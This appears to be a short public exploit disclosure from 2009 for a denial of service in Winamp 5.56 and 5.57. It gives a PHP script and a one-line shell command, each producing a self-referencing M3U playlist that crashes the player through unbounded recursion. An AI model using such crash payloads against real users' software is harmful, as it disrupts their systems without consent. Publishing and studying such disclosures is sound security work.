# Exploit Title: Winamp <= 5.57 Stack Overflow
# Date: 22 Dec 2009
# Author: scriptjunkie, scriptjunkie.1 {nospam} googlemail {nospam} com
# Software Link: http://www.winamp.com/media-player
# Version: 5.57, 5.56
# Tested on: Windows XP, Windows 7
# CVE: none at time of writing
# Code:
PHP:
<?php
header("Content-type: audio/x-mpegurl");
echo $_SERVER["SCRIPT_URI"]."/blah.m3u";
?>
Local M3U:
echo "a.m3u" > a.m3u
# OMG WE'RE PWNED: chill, it's not a stack buffer overflow, just a stack overflow. DoS.